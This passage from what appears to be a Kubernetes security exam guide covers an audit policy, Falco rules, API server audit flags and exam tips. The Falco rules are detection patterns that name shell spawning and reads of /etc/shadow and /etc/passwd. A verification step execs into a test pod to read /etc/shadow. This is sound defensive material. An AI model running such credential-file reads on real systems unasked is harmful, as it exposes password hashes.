securityContext:
readOnlyRootFilesystem: true
allowPrivilegeEscalation: false
volumeMounts:
- name: tmp
mountPath: /tmp
- name: var-run
mountPath: /var/run
- name: var-cache-nginx
mountPath: /var/cache/nginx
- name: var-log-nginx
mountPath: /var/log/nginx
volumes:
- name: tmp
emptyDir: {}
- name: var-run
emptyDir: {}
- name: var-cache-nginx
emptyDir: {}
- name: var-log-nginx
emptyDir: {}
EOF
# Verify remediated pod
kubectl wait --for=condition=ready pod/app-server -n production --timeout=60s
kubectl get pod app-server -n production
kubectl get pod app-server -n production -o jsonpath='{.spec.containers[0].securityContext}'
echo ""
echo "Remediation complete"Solution 20: Comprehensive Security Monitoring Setup
Step-by-Step
Part 1: Create the comprehensive audit policy
Create /etc/kubernetes/audit/comprehensive-policy.yaml:
apiVersion: audit.k8s.io/v1
kind: Policy
omitStages:
- "RequestReceived"
rules:
# Do NOT log get/list/watch on endpoints and services
- level: None
resources:
- group: ""
resources: ["endpoints", "services", "services/status"]
verbs: ["get", "list", "watch"]
# Do NOT log kube-proxy watch requests
- level: None
users: ["system:kube-proxy"]
verbs: ["watch"]
# Do NOT log requests to health/readiness endpoints
- level: None
nonResourceURLs:
- "/healthz*"
- "/readyz*"
- "/livez*"
# Log Secrets at Metadata level only
- level: Metadata
resources:
- group: ""
resources: ["secrets"]
# Log RBAC changes at RequestResponse level
- level: RequestResponse
resources:
- group: "rbac.authorization.k8s.io"
resources: ["roles", "rolebindings", "clusterroles", "clusterrolebindings"]
verbs: ["create", "update", "patch", "delete"]
# Log pods/exec and pods/portforward at Request level
- level: Request
resources:
- group: ""
resources: ["pods/exec", "pods/portforward"]
# Catch-all: log everything else at Metadata level
- level: Metadata
Part 2: Create the comprehensive Falco rules
Create /etc/falco/rules.d/comprehensive.yaml:
# Lists
- list: shell_binaries
items: [bash, sh, dash, zsh]
- list: package_mgr_binaries
items: [apt, apt-get, dpkg, yum, rpm, pip, pip3, npm, apk]
- list: sensitive_files
items: [/etc/shadow, /etc/passwd]
# Rule 1: Shell spawning in containers
- rule: Shell Spawned in Container
desc: Detects shell execution inside containers
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (shell_binaries)
output: >
Shell spawned in container
(user=%user.name shell=%proc.name cmdline=%proc.cmdline
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: WARNING
tags: [shell, container]
# Rule 2: Package manager in containers
- rule: Package Manager in Container
desc: Detects package manager execution inside containers
condition: >
evt.type in (execve, execveat) and
evt.dir=< and
container.id != host and
proc.name in (package_mgr_binaries)
output: >
Package manager in container
(manager=%proc.name cmdline=%proc.cmdline
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: ERROR
tags: [package_manager, immutability, container]
# Rule 3: Sensitive file reads
- rule: Sensitive File Read in Container
desc: Detects reads of /etc/shadow or /etc/passwd in containers
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_read=true and
container.id != host and
fd.name in (sensitive_files)
output: >
Sensitive file read in container
(file=%fd.name process=%proc.name user=%user.name
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: WARNING
tags: [sensitive_files, filesystem, container]
# Rule 4: Write to /etc in containers
- rule: Write Below Etc in Container
desc: Detects write operations to /etc directory in containers
condition: >
evt.type in (open, openat, openat2) and
evt.is_open_write=true and
container.id != host and
fd.name startswith /etc
output: >
File write to /etc in container
(file=%fd.name process=%proc.name user=%user.name
container=%container.name pod=%k8s.pod.name
ns=%k8s.ns.name image=%container.image.repository)
priority: ERROR
tags: [filesystem, etc_modification, container]
Part 3: Configure API server
Edit /etc/kubernetes/manifests/kube-apiserver.yaml:
sudo vi /etc/kubernetes/manifests/kube-apiserver.yaml
Add flags:
- --audit-policy-file=/etc/kubernetes/audit/comprehensive-policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/comprehensive.log
- --audit-log-maxage=30
- --audit-log-maxbackup=10
- --audit-log-maxsize=100
Add volume mounts:
- name: audit-policy
mountPath: /etc/kubernetes/audit/comprehensive-policy.yaml
readOnly: true
- name: audit-log
mountPath: /var/log/kubernetes/audit
Add volumes:
- name: audit-policy
hostPath:
path: /etc/kubernetes/audit/comprehensive-policy.yaml
type: File
- name: audit-log
hostPath:
path: /var/log/kubernetes/audit
type: DirectoryOrCreate
Part 4: Restart Falco and verify
# Restart Falco
sudo systemctl restart falco
# Wait for API server to restart
sleep 30
kubectl get nodes
# Verify audit logging
ls -la /var/log/kubernetes/audit/comprehensive.log
tail -5 /var/log/kubernetes/audit/comprehensive.log | jq .verb
# Verify Falco
sudo systemctl status falco
sudo journalctl -u falco --since "2 minutes ago" | head -20
# Test by creating a pod and exec-ing
kubectl run test-comprehensive --image=nginx
kubectl wait --for=condition=ready pod/test-comprehensive
kubectl exec test-comprehensive -- bash -c "cat /etc/shadow"
# Verify audit log has the exec event
cat /var/log/kubernetes/audit/comprehensive.log | jq 'select(.objectRef.subresource=="exec")' | tail -5
# Verify Falco captured the shell and shadow file read
sudo journalctl -u falco --since "2 minutes ago" | grep -E "Shell|Sensitive"
# Clean up
kubectl delete pod test-comprehensive
echo "Comprehensive security monitoring setup complete and verified"Final Exam Tips
- Practice the end-to-end workflow: audit policy creation, API server configuration, Falco rule writing, and verification
- Memorize the API server audit flags and volume mount structure
- Know Falco rule syntax -- condition, output, priority, tags
- Always verify after making changes -- check that the API server comes back, Falco restarts, and alerts are generated
- Time management: audit logging configuration is configuration-heavy. Have a template memorized to save time
- jq is your friend: practice common jq patterns for filtering audit logs
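As a starting point for that template, the following condensed snippet collects the flag, volumeMount, and volume stanzas used throughout this chapter (adjust file names and paths to match the question):
# kube-apiserver flags
- --audit-policy-file=/etc/kubernetes/audit/policy.yaml
- --audit-log-path=/var/log/kubernetes/audit/audit.log
- --audit-log-maxage=30
- --audit-log-maxbackup=5
- --audit-log-maxsize=100
# volumeMounts (container)
- name: audit-policy
  mountPath: /etc/kubernetes/audit/policy.yaml
  readOnly: true
- name: audit-log
  mountPath: /var/log/kubernetes/audit
# volumes (pod spec)
- name: audit-policy
  hostPath:
    path: /etc/kubernetes/audit/policy.yaml
    type: File
- name: audit-log
  hostPath:
    path: /var/log/kubernetes/audit
    type: DirectoryOrCreate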